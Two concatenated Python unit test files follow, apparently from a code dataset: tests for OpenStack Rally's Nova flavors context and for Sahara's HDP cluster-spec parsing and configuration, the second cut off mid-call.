aplanas/rally | tests/unit/plugins/openstack/context/nova/test_flavors.py | 13 | 3947 | # Copyright 2014: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import mock
from novaclient import exceptions as nova_exceptions
from rally.plugins.openstack.context.nova import flavors
from tests.unit import test
CTX = "rally.plugins.openstack.context.nova"
class FlavorsGeneratorTestCase(test.TestCase):
def setUp(self):
super(FlavorsGeneratorTestCase, self).setUp()
self.context = {
"config": {
"flavors": [{
"name": "flavor_name",
"ram": 2048,
"disk": 10,
"vcpus": 3,
"ephemeral": 3,
"swap": 5,
"extra_specs": {
"key": "value"
}
}]
},
"admin": {
"endpoint": mock.MagicMock()
},
"task": mock.MagicMock(),
}
@mock.patch("%s.flavors.osclients.Clients" % CTX)
def test_setup(self, mock_clients):
# Setup and mock
mock_create = mock_clients().nova().flavors.create
mock_create().to_dict.return_value = {"flavor_key": "flavor_value"}
# Run
flavors_ctx = flavors.FlavorsGenerator(self.context)
flavors_ctx.setup()
# Assertions
self.assertEqual(flavors_ctx.context["flavors"],
{"flavor_name": {"flavor_key": "flavor_value"}})
mock_clients.assert_called_with(self.context["admin"]["endpoint"])
mock_create.assert_called_with(
name="flavor_name", ram=2048, vcpus=3,
disk=10, ephemeral=3, swap=5)
mock_create().set_keys.assert_called_with({"key": "value"})
mock_create().to_dict.assert_called_with()
@mock.patch("%s.flavors.osclients.Clients" % CTX)
def test_setup_failexists(self, mock_clients):
# Setup and mock
new_context = copy.deepcopy(self.context)
new_context["flavors"] = {}
mock_flavor_create = mock_clients().nova().flavors.create
exception = nova_exceptions.Conflict("conflict")
mock_flavor_create.side_effect = exception
# Run
flavors_ctx = flavors.FlavorsGenerator(self.context)
flavors_ctx.setup()
# Assertions
self.assertEqual(new_context, flavors_ctx.context)
mock_clients.assert_called_with(self.context["admin"]["endpoint"])
mock_flavor_create.assert_called_once_with(
name="flavor_name", ram=2048, vcpus=3,
disk=10, ephemeral=3, swap=5)
@mock.patch("%s.flavors.osclients.Clients" % CTX)
def test_cleanup(self, mock_clients):
# Setup and mock
real_context = {
"flavors": {
"flavor_name": {
"flavor_name": "flavor_name",
"id": "flavor_name"
}
},
"admin": {
"endpoint": mock.MagicMock()
},
"task": mock.MagicMock(),
}
# Run
flavors_ctx = flavors.FlavorsGenerator(real_context)
flavors_ctx.cleanup()
# Assertions
mock_clients.assert_called_with(real_context["admin"]["endpoint"])
mock_flavors_delete = mock_clients().nova().flavors.delete
mock_flavors_delete.assert_called_with("flavor_name")
| apache-2.0 | 6,756,423,582,459,452,000 | 31.619835 | 78 | 0.569546 | false |
citrix-openstack-build/sahara | sahara/tests/unit/plugins/hdp/test_clusterspec.py | 3 | 69753 | # Copyright (c) 2013 Hortonworks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import pkg_resources as pkg
from sahara.plugins import exceptions as ex
from sahara.plugins.hdp import clusterspec as cs
from sahara.plugins.hdp import hadoopserver
from sahara.plugins.hdp.versions.version_1_3_2 import services as s
from sahara.plugins import provisioning
from sahara.tests.unit import base as sahara_base
import sahara.tests.unit.plugins.hdp.hdp_test_base as base
from sahara.topology import topology_helper as th
from sahara import version
class TestCONF(object):
def __init__(self, enable_data_locality, enable_hypervisor_awareness):
self.enable_data_locality = enable_data_locality
self.enable_hypervisor_awareness = enable_hypervisor_awareness
@mock.patch("sahara.utils.openstack.nova.get_instance_info",
base.get_instance_info)
@mock.patch('sahara.plugins.hdp.versions.version_1_3_2.services.HdfsService.'
'_get_swift_properties',
return_value=[])
class ClusterSpecTest(sahara_base.SaharaTestCase):
service_validators = {}
def setUp(self):
super(ClusterSpecTest, self).setUp()
self.service_validators['HDFS'] = self._assert_hdfs
self.service_validators['MAPREDUCE'] = self._assert_mr
self.service_validators['GANGLIA'] = self._assert_ganglia
self.service_validators['NAGIOS'] = self._assert_nagios
self.service_validators['AMBARI'] = self._assert_ambari
self.service_validators['PIG'] = self._assert_pig
self.service_validators['HIVE'] = self._assert_hive
self.service_validators['HCATALOG'] = self._assert_hcatalog
self.service_validators['ZOOKEEPER'] = self._assert_zookeeper
self.service_validators['WEBHCAT'] = self._assert_webhcat
self.service_validators['OOZIE'] = self._assert_oozie
self.service_validators['SQOOP'] = self._assert_sqoop
self.service_validators['HBASE'] = self._assert_hbase
# TODO(jspeidel): test host manifest
def test_parse_default_with_cluster(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
server1 = base.TestServer('host1', 'test-master', '11111', 3,
'111.11.1111', '222.11.1111')
server2 = base.TestServer('host2', 'test-slave', '11111', 3,
'222.22.2222', '333.22.2222')
node_group1 = TestNodeGroup(
'master', [server1], ["NAMENODE", "JOBTRACKER",
"SECONDARY_NAMENODE", "GANGLIA_SERVER",
"GANGLIA_MONITOR", "NAGIOS_SERVER",
"AMBARI_SERVER", "AMBARI_AGENT"])
node_group2 = TestNodeGroup('slave', [server2], ['TASKTRACKER',
'DATANODE'])
cluster = base.TestCluster([node_group1, node_group2])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(cluster, [])
self._assert_services(cluster_config.services)
self._assert_configurations(cluster_config.configurations)
node_groups = cluster_config.node_groups
self.assertEqual(2, len(node_groups))
self.assertIn('master', node_groups)
self.assertIn('slave', node_groups)
master_node_group = node_groups['master']
self.assertEqual('master', master_node_group.name)
self.assertEqual(9, len(master_node_group.components))
self.assertIn('NAMENODE', master_node_group.components)
self.assertIn('JOBTRACKER', master_node_group.components)
self.assertIn('SECONDARY_NAMENODE', master_node_group.components)
self.assertIn('GANGLIA_SERVER', master_node_group.components)
self.assertIn('GANGLIA_MONITOR', master_node_group.components)
self.assertIn('NAGIOS_SERVER', master_node_group.components)
self.assertIn('AMBARI_SERVER', master_node_group.components)
self.assertIn('AMBARI_AGENT', master_node_group.components)
self.assertIn('HISTORYSERVER', master_node_group.components)
slave_node_group = node_groups['slave']
self.assertEqual('slave', slave_node_group.name)
self.assertIn('TASKTRACKER', slave_node_group.components)
return cluster_config
def test_determine_component_hosts(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
server1 = base.TestServer('ambari_machine', 'master', '11111', 3,
'111.11.1111', '222.11.1111')
server2 = base.TestServer('host2', 'slave', '11111', 3, '222.22.2222',
'333.22.2222')
server3 = base.TestServer('host3', 'slave', '11111', 3, '222.22.2223',
'333.22.2223')
node_group1 = TestNodeGroup(
'master', [server1], ["NAMENODE", "JOBTRACKER",
"SECONDARY_NAMENODE", "GANGLIA_SERVER",
"NAGIOS_SERVER", "AMBARI_SERVER"])
node_group2 = TestNodeGroup(
'slave', [server2], ["DATANODE", "TASKTRACKER",
"HDFS_CLIENT", "MAPREDUCE_CLIENT"])
node_group3 = TestNodeGroup(
'slave2', [server3], ["DATANODE", "TASKTRACKER",
"HDFS_CLIENT", "MAPREDUCE_CLIENT"])
cluster = base.TestCluster([node_group1, node_group2, node_group3])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(cluster, [])
hosts = cluster_config.determine_component_hosts('AMBARI_SERVER')
self.assertEqual(1, len(hosts))
self.assertEqual('ambari_machine', hosts.pop().fqdn())
hosts = cluster_config.determine_component_hosts('DATANODE')
self.assertEqual(2, len(hosts))
datanodes = set([server2.fqdn(), server3.fqdn()])
host_fqdn = set([hosts.pop().fqdn(), hosts.pop().fqdn()])
# test intersection is both servers
self.assertEqual(datanodes, host_fqdn & datanodes)
def test_finalize_configuration(self, patched):
patched.return_value = [{'name': 'swift.prop1',
'value': 'swift_prop_value'},
{'name': 'swift.prop2',
'value': 'swift_prop_value2'}]
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
master_host = base.TestServer(
'master.novalocal', 'master', '11111', 3,
'111.11.1111', '222.11.1111')
jt_host = base.TestServer(
'jt_host.novalocal', 'jt', '11111', 3,
'111.11.2222', '222.11.2222')
nn_host = base.TestServer(
'nn_host.novalocal', 'nn', '11111', 3,
'111.11.3333', '222.11.3333')
snn_host = base.TestServer(
'snn_host.novalocal', 'jt', '11111', 3,
'111.11.4444', '222.11.4444')
hive_host = base.TestServer(
'hive_host.novalocal', 'hive', '11111', 3,
'111.11.5555', '222.11.5555')
hive_ms_host = base.TestServer(
'hive_ms_host.novalocal', 'hive_ms', '11111', 3,
'111.11.6666', '222.11.6666')
hive_mysql_host = base.TestServer(
'hive_mysql_host.novalocal', 'hive_mysql', '11111', 3,
'111.11.7777', '222.11.7777')
hcat_host = base.TestServer(
'hcat_host.novalocal', 'hcat', '11111', 3,
'111.11.8888', '222.11.8888')
zk1_host = base.TestServer(
'zk1_host.novalocal', 'zk1', '11111', 3,
'111.11.9999', '222.11.9999')
zk2_host = base.TestServer(
'zk2_host.novalocal', 'zk2', '11112', 3,
'111.11.9990', '222.11.9990')
oozie_host = base.TestServer(
'oozie_host.novalocal', 'oozie', '11111', 3,
'111.11.9999', '222.11.9999')
slave_host = base.TestServer(
'slave1.novalocal', 'slave', '11111', 3,
'222.22.6666', '333.22.6666')
master_ng = TestNodeGroup(
'master', [master_host], ["GANGLIA_SERVER",
"GANGLIA_MONITOR",
"NAGIOIS_SERVER",
"AMBARI_SERVER",
"AMBARI_AGENT"])
jt_ng = TestNodeGroup(
'jt', [jt_host], ["JOBTRACKER", "GANGLIA_MONITOR",
"AMBARI_AGENT"])
nn_ng = TestNodeGroup(
'nn', [nn_host], ["NAMENODE", "GANGLIA_MONITOR",
"AMBARI_AGENT"])
snn_ng = TestNodeGroup(
'snn', [snn_host], ["SECONDARY_NAMENODE", "GANGLIA_MONITOR",
"AMBARI_AGENT"])
hive_ng = TestNodeGroup(
'hive', [hive_host], ["HIVE_SERVER", "GANGLIA_MONITOR",
"AMBARI_AGENT"])
hive_ms_ng = TestNodeGroup(
'meta', [hive_ms_host], ["HIVE_METASTORE", "GANGLIA_MONITOR",
"AMBARI_AGENT"])
hive_mysql_ng = TestNodeGroup(
'mysql', [hive_mysql_host], ["MYSQL_SERVER", "GANGLIA_MONITOR",
"AMBARI_AGENT"])
hcat_ng = TestNodeGroup(
'hcat', [hcat_host], ["WEBHCAT_SERVER", "GANGLIA_MONITOR",
"AMBARI_AGENT"])
zk1_ng = TestNodeGroup(
'zk1', [zk1_host], ["ZOOKEEPER_SERVER", "GANGLIA_MONITOR",
"AMBARI_AGENT"])
zk2_ng = TestNodeGroup(
'zk2', [zk2_host], ["ZOOKEEPER_SERVER", "GANGLIA_MONITOR",
"AMBARI_AGENT"])
oozie_ng = TestNodeGroup(
'oozie', [oozie_host], ["OOZIE_SERVER", "GANGLIA_MONITOR",
"AMBARI_AGENT"])
slave_ng = TestNodeGroup(
'slave', [slave_host], ["DATANODE", "TASKTRACKER",
"GANGLIA_MONITOR", "HDFS_CLIENT",
"MAPREDUCE_CLIENT", "OOZIE_CLIENT",
"AMBARI_AGENT"])
user_input_config = TestUserInputConfig(
'core-site', 'cluster', 'fs.default.name')
user_input = provisioning.UserInput(
user_input_config, 'hdfs://nn_dif_host.novalocal:8020')
cluster = base.TestCluster([master_ng, jt_ng, nn_ng, snn_ng, hive_ng,
hive_ms_ng, hive_mysql_ng,
hcat_ng, zk1_ng, zk2_ng, oozie_ng,
slave_ng])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(cluster, [user_input])
config = cluster_config.configurations
# for this value, validating that user inputs override configured
# values, whether they are processed by runtime or not
self.assertEqual(config['core-site']['fs.default.name'],
'hdfs://nn_dif_host.novalocal:8020')
self.assertEqual(config['mapred-site']['mapred.job.tracker'],
'jt_host.novalocal:50300')
self.assertEqual(config['mapred-site']
['mapred.job.tracker.http.address'],
'jt_host.novalocal:50030')
self.assertEqual(config['mapred-site']
['mapreduce.history.server.http.address'],
'jt_host.novalocal:51111')
self.assertEqual(config['hdfs-site']['dfs.http.address'],
'nn_host.novalocal:50070')
self.assertEqual(config['hdfs-site']['dfs.secondary.http.address'],
'snn_host.novalocal:50090')
self.assertEqual(config['hdfs-site']['dfs.https.address'],
'nn_host.novalocal:50470')
self.assertEqual(config['global']['hive_hostname'],
'hive_host.novalocal')
self.assertEqual(config['core-site']['hadoop.proxyuser.hive.hosts'],
'hive_host.novalocal')
self.assertEqual(config['hive-site']
['javax.jdo.option.ConnectionURL'],
'jdbc:mysql://hive_host.novalocal/hive?'
'createDatabaseIfNotExist=true')
self.assertEqual(config['hive-site']['hive.metastore.uris'],
'thrift://hive_ms_host.novalocal:9083')
self.assertTrue(
'hive.metastore.uris=thrift://hive_ms_host.novalocal:9083' in
config['webhcat-site']['templeton.hive.properties'])
self.assertEqual(config['global']['hive_jdbc_connection_url'],
'jdbc:mysql://hive_mysql_host.novalocal/hive?'
'createDatabaseIfNotExist=true')
self.assertEqual(config['core-site']['hadoop.proxyuser.hcat.hosts'],
'hcat_host.novalocal')
self.assertEqual(set(
config['webhcat-site']['templeton.zookeeper.hosts'].split(',')),
set(['zk1_host.novalocal:2181', 'zk2_host.novalocal:2181']))
self.assertEqual(config['oozie-site']['oozie.base.url'],
'http://oozie_host.novalocal:11000/oozie')
self.assertEqual(config['global']['oozie_hostname'],
'oozie_host.novalocal')
self.assertEqual(config['core-site']['hadoop.proxyuser.oozie.hosts'],
'oozie_host.novalocal,222.11.9999,111.11.9999')
# test swift properties
self.assertEqual('swift_prop_value',
config['core-site']['swift.prop1'])
self.assertEqual('swift_prop_value2',
config['core-site']['swift.prop2'])
def test__determine_deployed_services(self, nova_mock):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
master_host = base.TestServer(
'master.novalocal', 'master', '11111', 3,
'111.11.1111', '222.11.1111')
jt_host = base.TestServer(
'jt_host.novalocal', 'jt', '11111', 3,
'111.11.2222', '222.11.2222')
nn_host = base.TestServer(
'nn_host.novalocal', 'nn', '11111', 3,
'111.11.3333', '222.11.3333')
snn_host = base.TestServer(
'snn_host.novalocal', 'jt', '11111', 3,
'111.11.4444', '222.11.4444')
slave_host = base.TestServer(
'slave1.novalocal', 'slave', '11111', 3,
'222.22.6666', '333.22.6666')
master_ng = TestNodeGroup(
'master', [master_host],
['GANGLIA_SERVER',
'GANGLIA_MONITOR', 'NAGIOS_SERVER',
'AMBARI_SERVER', 'AMBARI_AGENT'])
jt_ng = TestNodeGroup('jt', [jt_host], ["JOBTRACKER",
"GANGLIA_MONITOR", "AMBARI_AGENT"])
nn_ng = TestNodeGroup('nn', [nn_host], ["NAMENODE",
"GANGLIA_MONITOR", "AMBARI_AGENT"])
snn_ng = TestNodeGroup('snn', [snn_host], ["SECONDARY_NAMENODE",
"GANGLIA_MONITOR", "AMBARI_AGENT"])
slave_ng = TestNodeGroup(
'slave', [slave_host],
["DATANODE", "TASKTRACKER",
"GANGLIA_MONITOR", "HDFS_CLIENT", "MAPREDUCE_CLIENT",
"AMBARI_AGENT"])
cluster = base.TestCluster([master_ng, jt_ng, nn_ng,
snn_ng, slave_ng])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(cluster, [])
services = cluster_config.services
for service in services:
if service.name in ['HDFS', 'MAPREDUCE', 'GANGLIA',
'AMBARI', 'NAGIOS']:
self.assertTrue(service.deployed)
else:
self.assertFalse(service.deployed)
def test_ambari_rpm_path(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
cluster_spec = cs.ClusterSpec(cluster_config_file)
ambari_config = cluster_spec.configurations['ambari']
rpm = ambari_config.get('rpm', None)
self.assertEqual('http://s3.amazonaws.com/'
'public-repo-1.hortonworks.com/ambari/centos6/'
'1.x/updates/1.6.0/ambari.repo', rpm)
def test_default_ambari_rpm_path(self, patched):
self.assertEqual('http://s3.amazonaws.com/'
'public-repo-1.hortonworks.com/ambari/centos6/'
'1.x/updates/1.6.0/ambari.repo',
hadoopserver.AMBARI_RPM)
def test_parse_default(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
cluster_config = cs.ClusterSpec(cluster_config_file)
self._assert_services(cluster_config.services)
self._assert_configurations(cluster_config.configurations)
node_groups = cluster_config.node_groups
self.assertEqual(2, len(node_groups))
master_node_group = node_groups['master']
self.assertEqual('master', master_node_group.name)
self.assertIsNone(master_node_group.predicate)
self.assertEqual('1', master_node_group.cardinality)
self.assertEqual(6, len(master_node_group.components))
self.assertIn('NAMENODE', master_node_group.components)
self.assertIn('JOBTRACKER', master_node_group.components)
self.assertIn('SECONDARY_NAMENODE', master_node_group.components)
self.assertIn('GANGLIA_SERVER', master_node_group.components)
self.assertIn('NAGIOS_SERVER', master_node_group.components)
self.assertIn('AMBARI_SERVER', master_node_group.components)
slave_node_group = node_groups['slave']
self.assertEqual('slave', slave_node_group.name)
self.assertIsNone(slave_node_group.predicate)
self.assertEqual('1+', slave_node_group.cardinality)
self.assertEqual(4, len(slave_node_group.components))
self.assertIn('DATANODE', slave_node_group.components)
self.assertIn('TASKTRACKER', slave_node_group.components)
self.assertIn('HDFS_CLIENT', slave_node_group.components)
self.assertIn('MAPREDUCE_CLIENT', slave_node_group.components)
return cluster_config
def test_ambari_rpm(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
cluster_config = cs.ClusterSpec(cluster_config_file)
self._assert_configurations(cluster_config.configurations)
ambari_config = cluster_config.configurations['ambari']
self.assertIsNotNone('no rpm uri found',
ambari_config.get('rpm', None))
def test_normalize(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster = cluster_config.normalize()
configs = cluster.cluster_configs
contains_dfs_datanode_http_address = False
contains_mapred_jobtracker_taskScheduler = False
contains_dfs_include = False
for entry in configs:
config = entry.config
# assert some random configurations across targets
if config.name == 'dfs.datanode.http.address':
contains_dfs_datanode_http_address = True
self.assertEqual('string', config.type)
self.assertEqual('0.0.0.0:50075', config.default_value)
self.assertEqual('HDFS', config.applicable_target)
if config.name == 'mapred.jobtracker.taskScheduler':
contains_mapred_jobtracker_taskScheduler = True
self.assertEqual('string', config.type)
self.assertEqual(
'org.apache.hadoop.mapred.CapacityTaskScheduler',
config.default_value)
self.assertEqual('MAPREDUCE',
config.applicable_target)
if config.name == 'dfs_include':
contains_dfs_include = True
self.assertEqual('string', config.type)
self.assertEqual('dfs.include', config.default_value)
self.assertEqual('HDFS', config.applicable_target)
# print 'Config: name: {0}, type:{1},
# default value:{2}, target:{3}, Value:{4}'.format(
# config.name, config.type,
# config.default_value,
# config.applicable_target, entry.value)
self.assertTrue(contains_dfs_datanode_http_address)
self.assertTrue(contains_mapred_jobtracker_taskScheduler)
self.assertTrue(contains_dfs_include)
node_groups = cluster.node_groups
self.assertEqual(2, len(node_groups))
contains_master_group = False
contains_slave_group = False
for i in range(2):
node_group = node_groups[i]
components = node_group.node_processes
if node_group.name == "master":
contains_master_group = True
self.assertEqual(6, len(components))
self.assertIn('NAMENODE', components)
self.assertIn('JOBTRACKER', components)
self.assertIn('SECONDARY_NAMENODE', components)
self.assertIn('GANGLIA_SERVER', components)
self.assertIn('NAGIOS_SERVER', components)
self.assertIn('AMBARI_SERVER', components)
# TODO(jspeidel): node configs
# TODO(jspeidel): vm_requirements
elif node_group.name == 'slave':
contains_slave_group = True
self.assertEqual(4, len(components))
self.assertIn('DATANODE', components)
self.assertIn('TASKTRACKER', components)
self.assertIn('HDFS_CLIENT', components)
self.assertIn('MAPREDUCE_CLIENT', components)
# TODO(jspeidel): node configs
# TODO(jspeidel): vm requirements
else:
self.fail('Unexpected node group: {0}'.format(node_group.name))
self.assertTrue(contains_master_group)
self.assertTrue(contains_slave_group)
def test_existing_config_item_in_top_level_within_blueprint(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
user_input_config = TestUserInputConfig(
'global', 'general', 'fs_checkpoint_dir')
user_input = provisioning.UserInput(user_input_config,
'/some/new/path')
server1 = base.TestServer('host1', 'test-master', '11111', 3,
'111.11.1111', '222.11.1111')
server2 = base.TestServer('host2', 'test-slave', '11111', 3,
'222.22.2222', '333.22.2222')
node_group1 = TestNodeGroup(
'master', [server1], ["NAMENODE", "JOBTRACKER",
"SECONDARY_NAMENODE", "GANGLIA_SERVER",
"GANGLIA_MONITOR", "NAGIOS_SERVER",
"AMBARI_SERVER", "AMBARI_AGENT"])
node_group2 = TestNodeGroup(
'slave', [server2], ["TASKTRACKER", "DATANODE",
"AMBARI_AGENT", "GANGLIA_MONITOR"])
cluster = base.TestCluster([node_group1, node_group2])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(cluster, [user_input])
self.assertEqual('/some/new/path', cluster_config.configurations
['global']['fs_checkpoint_dir'])
def test_new_config_item_in_top_level_within_blueprint(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
user_input_config = TestUserInputConfig(
'global', 'general', 'new_property')
user_input = provisioning.UserInput(user_input_config, 'foo')
server1 = base.TestServer('host1', 'test-master', '11111', 3,
'111.11.1111', '222.11.1111')
server2 = base.TestServer('host2', 'test-slave', '11111', 3,
'222.22.2222', '333.22.2222')
node_group1 = TestNodeGroup(
'master', [server1],
["NAMENODE", "JOBTRACKER",
"SECONDARY_NAMENODE", "GANGLIA_SERVER", "GANGLIA_MONITOR",
"NAGIOS_SERVER", "AMBARI_SERVER", "AMBARI_AGENT"])
node_group2 = TestNodeGroup(
'slave', [server2],
["TASKTRACKER", "DATANODE", "AMBARI_AGENT",
"GANGLIA_MONITOR"])
cluster = base.TestCluster([node_group1, node_group2])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(cluster, [user_input])
self.assertEqual(
'foo', cluster_config.configurations['global']['new_property'])
def test_topology_configuration_no_hypervisor(self, patched):
s_conf = s.CONF
th_conf = th.CONF
try:
s.CONF = TestCONF(True, False)
th.CONF = TestCONF(True, False)
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
server1 = base.TestServer('host1', 'test-master', '11111', 3,
'111.11.1111', '222.11.1111')
server2 = base.TestServer('host2', 'test-slave', '11111', 3,
'222.22.2222', '333.22.2222')
node_group1 = TestNodeGroup(
'master', [server1], ["NAMENODE", "JOBTRACKER",
"SECONDARY_NAMENODE", "GANGLIA_SERVER",
"GANGLIA_MONITOR", "NAGIOS_SERVER",
"AMBARI_SERVER", "AMBARI_AGENT"])
node_group2 = TestNodeGroup(
'slave', [server2], ["TASKTRACKER", "DATANODE", "AMBARI_AGENT",
"GANGLIA_MONITOR"])
cluster = base.TestCluster([node_group1, node_group2])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(cluster, [])
# core-site
self.assertEqual(
'org.apache.hadoop.net.NetworkTopology',
cluster_config.configurations['core-site']
['net.topology.impl'])
self.assertEqual(
'true',
cluster_config.configurations['core-site']
['net.topology.nodegroup.aware'])
self.assertEqual(
'org.apache.hadoop.hdfs.server.namenode.'
'BlockPlacementPolicyWithNodeGroup',
cluster_config.configurations['core-site']
['dfs.block.replicator.classname'])
self.assertEqual(
'true',
cluster_config.configurations['core-site']
['fs.swift.service.sahara.location-aware'])
self.assertEqual(
'org.apache.hadoop.net.ScriptBasedMapping',
cluster_config.configurations['core-site']
['topology.node.switch.mapping.impl'])
self.assertEqual(
'/etc/hadoop/conf/topology.sh',
cluster_config.configurations['core-site']
['topology.script.file.name'])
# mapred-site
self.assertEqual(
'true',
cluster_config.configurations['mapred-site']
['mapred.jobtracker.nodegroup.aware'])
self.assertEqual(
'3',
cluster_config.configurations['mapred-site']
['mapred.task.cache.levels'])
self.assertEqual(
'org.apache.hadoop.mapred.JobSchedulableWithNodeGroup',
cluster_config.configurations['mapred-site']
['mapred.jobtracker.jobSchedulable'])
finally:
s.CONF = s_conf
th.CONF = th_conf
def test_topology_configuration_with_hypervisor(self, patched):
s_conf = s.CONF
try:
s.CONF = TestCONF(True, True)
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
server1 = base.TestServer('host1', 'test-master', '11111', 3,
'111.11.1111', '222.11.1111')
server2 = base.TestServer('host2', 'test-slave', '11111', 3,
'222.22.2222', '333.22.2222')
node_group1 = TestNodeGroup(
'master', [server1], ["NAMENODE", "JOBTRACKER",
"SECONDARY_NAMENODE", "GANGLIA_SERVER",
"GANGLIA_MONITOR", "NAGIOS_SERVER",
"AMBARI_SERVER", "AMBARI_AGENT"])
node_group2 = TestNodeGroup(
'slave', [server2], ["TASKTRACKER", "DATANODE", "AMBARI_AGENT",
"GANGLIA_MONITOR"])
cluster = base.TestCluster([node_group1, node_group2])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(cluster, [])
# core-site
self.assertEqual(
'org.apache.hadoop.net.NetworkTopologyWithNodeGroup',
cluster_config.configurations['core-site']
['net.topology.impl'])
finally:
s.CONF = s_conf
def test_update_ambari_admin_user(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
user_input_config = TestUserInputConfig('ambari-stack', 'AMBARI',
'ambari.admin.user')
user_input = provisioning.UserInput(user_input_config, 'new-user')
server1 = base.TestServer('host1', 'test-master', '11111', 3,
'111.11.1111', '222.11.1111')
server2 = base.TestServer('host2', 'test-slave', '11111', 3,
'222.22.2222', '333.22.2222')
node_group1 = TestNodeGroup(
'master', [server1],
["NAMENODE", "JOBTRACKER",
"SECONDARY_NAMENODE", "GANGLIA_SERVER", "GANGLIA_MONITOR",
"NAGIOS_SERVER", "AMBARI_SERVER", "AMBARI_AGENT"])
node_group2 = TestNodeGroup(
'slave', [server2],
["TASKTRACKER", "DATANODE",
"AMBARI_AGENT", "GANGLIA_MONITOR"])
cluster = base.TestCluster([node_group1, node_group2])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(cluster, [user_input])
ambari_service = next(service for service in cluster_config.services
if service.name == 'AMBARI')
users = ambari_service.users
self.assertEqual(1, len(users))
self.assertEqual('new-user', users[0].name)
def test_update_ambari_admin_password(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
user_input_config = TestUserInputConfig('ambari-stack', 'AMBARI',
'ambari.admin.password')
user_input = provisioning.UserInput(user_input_config, 'new-pwd')
server1 = base.TestServer('host1', 'test-master', '11111', 3,
'111.11.1111', '222.11.1111')
server2 = base.TestServer('host2', 'test-slave', '11111', 3,
'222.22.2222', '333.22.2222')
node_group1 = TestNodeGroup(
'master', [server1],
["NAMENODE", "JOBTRACKER",
"SECONDARY_NAMENODE", "GANGLIA_SERVER", "GANGLIA_MONITOR",
"NAGIOS_SERVER", "AMBARI_SERVER", "AMBARI_AGENT"])
node_group2 = TestNodeGroup(
'slave', [server2],
["TASKTRACKER", "DATANODE",
"AMBARI_AGENT", "GANGLIA_MONITOR"])
cluster = base.TestCluster([node_group1, node_group2])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(cluster, [user_input])
ambari_service = next(service for service in cluster_config.services
if service.name == 'AMBARI')
users = ambari_service.users
self.assertEqual(1, len(users))
self.assertEqual('new-pwd', users[0].password)
def test_update_ambari_admin_user_and_password(self, patched):
cluster_config_file = pkg.resource_string(
version.version_info.package,
'plugins/hdp/versions/version_1_3_2/resources/'
'default-cluster.template')
user_user_input_config = TestUserInputConfig('ambari-stack', 'AMBARI',
'ambari.admin.user')
pwd_user_input_config = TestUserInputConfig('ambari-stack', 'AMBARI',
'ambari.admin.password')
user_user_input = provisioning.UserInput(user_user_input_config,
'new-admin_user')
pwd_user_input = provisioning.UserInput(pwd_user_input_config,
'new-admin_pwd')
server1 = base.TestServer('host1', 'test-master', '11111', 3,
'111.11.1111', '222.11.1111')
server2 = base.TestServer('host2', 'test-slave', '11111', 3,
'222.22.2222', '333.22.2222')
node_group1 = TestNodeGroup(
'one', [server1], ["NAMENODE", "JOBTRACKER",
"SECONDARY_NAMENODE", "GANGLIA_SERVER",
"GANGLIA_MONITOR", "NAGIOS_SERVER",
"AMBARI_SERVER", "AMBARI_AGENT"])
node_group2 = TestNodeGroup(
'two', [server2], ["TASKTRACKER", "DATANODE",
"AMBARI_AGENT", "GANGLIA_MONITOR"])
cluster = base.TestCluster([node_group1, node_group2])
cluster_config = cs.ClusterSpec(cluster_config_file)
cluster_config.create_operational_config(
